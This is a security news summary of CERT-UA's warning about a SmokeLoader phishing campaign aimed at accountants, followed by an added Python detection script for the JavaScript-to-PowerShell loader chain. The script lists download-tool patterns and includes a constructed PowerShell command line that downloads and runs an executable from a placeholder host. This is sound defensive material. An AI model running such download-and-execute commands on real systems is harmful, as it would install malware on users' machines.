"CERT-UA Warns of an Ongoing SmokeLoader Campaign"

The Computer Emergency Response Team of Ukraine (CERT-UA) warns of an ongoing phishing campaign aimed at distributing the SmokeLoader malware in the form of a polyglot file. Threat actors are sending emails with the subject line "bill/payment" and a ZIP archive attachment from compromised accounts. The JavaScript involved in the attack uses PowerShell to download and run an executable that launches the SmokeLoader malware. SmokeLoader serves as a loader for other malware. Upon execution, it injects malicious code into the running Explorer process (explorer.exe) and downloads another payload. CERT-UA linked the campaign to the financially motivated threat actor UAC-0006, which has been active since at least 2013. The threat actors focus on compromising accountants' computers, which are used to support financial activities such as remote banking system access. They also steal credentials and initiate unauthorized fund transfers. This article continues to discuss researchers' findings regarding the phishing campaign distributing the SmokeLoader malware.
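The chain summarized above (JavaScript hands off to PowerShell, PowerShell downloads and runs an executable) leaves a process-creation trail that a SOC can match on. The following is an added detection example written for this page; it is not code from CERT-UA or Security Affairs and contains no artifacts from the campaign. It runs over Sysmon-style process-creation events and flags two links of that chain: a Windows script host (wscript.exe or cscript.exe) launching powershell.exe with a download primitive on its command line, and powershell.exe launching an executable from a user-writable staging directory. The field names, the list of download primitives, the staging-directory pattern and the sample events are all assumptions constructed for the example.

```python
"""Added detection example for the loader chain described above.

Not part of the CERT-UA or Security Affairs write-up. Event fields, the
download-primitive list, the staging-path pattern and all sample events are
constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Windows script hosts that run .js attachments.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Download primitives commonly seen on PowerShell command lines (assumed list;
# extend it to match your environment's telemetry).
DOWNLOAD_PATTERN = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer"
    r"|net\.webclient|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)

# User-writable directories where a freshly downloaded executable is usually
# staged before execution (assumption, not taken from the page).
STAGING_PATTERN = re.compile(r"\\(?:temp|appdata|downloads|public)\\", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style, constructed)."""
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a rule name if the event matches a link of the chain, else None."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    # Link 1: script host -> PowerShell carrying a download primitive.
    if (parent in SCRIPT_HOSTS and child == "powershell.exe"
            and DOWNLOAD_PATTERN.search(ev.command_line)):
        return "script-host-powershell-download"
    # Link 2: PowerShell -> executable launched from a staging directory.
    if (parent == "powershell.exe" and child.endswith(".exe")
            and STAGING_PATTERN.search(ev.image)):
        return "powershell-runs-staged-executable"
    return None


def detect(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every event that matches a rule."""
    findings = []
    for i, ev in enumerate(events):
        rule = classify(ev)
        if rule:
            findings.append((i, rule))
    return findings


# Constructed sample telemetry: two malicious-looking events, three benign ones.
SAMPLE_EVENTS = [
    ProcEvent(
        r"C:\Windows\System32\wscript.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
        "'http://example.invalid/file', $env:TEMP + '\\file.exe')",
    ),
    ProcEvent(
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"C:\Users\acct\AppData\Local\Temp\file.exe",
        r"C:\Users\acct\AppData\Local\Temp\file.exe",
    ),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell Get-ChildItem"),
    ProcEvent(r"C:\Windows\System32\cscript.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -File C:\scripts\inventory.ps1"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files\Git\bin\git.exe", "git pull"),
]


if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} <- {SAMPLE_EVENTS[idx].command_line}")
```

Both rules are deliberately narrow: a script host launching PowerShell is unusual but not unheard of in administrative scripting, so the first rule also requires a download primitive on the command line, and the second rule fires only when the child executable lives in a user-writable location rather than under Program Files or System32. Tune the staging-path pattern and the download-primitive list to your own baseline before deploying either rule as an alert.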

Security Affairs reports "CERT-UA Warns of an Ongoing SmokeLoader Campaign"
